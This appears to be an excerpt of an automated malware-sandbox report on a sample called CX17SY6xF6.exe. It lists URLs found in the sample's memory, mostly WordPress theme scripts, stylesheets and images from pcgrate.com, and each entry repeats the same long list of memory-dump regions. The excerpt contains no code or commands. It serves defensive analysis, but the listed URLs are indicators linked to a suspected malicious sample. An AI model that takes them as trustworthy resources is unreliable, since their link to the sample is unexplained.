                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1684171764
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1678274495
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1664959878
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=899328ee298e
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, 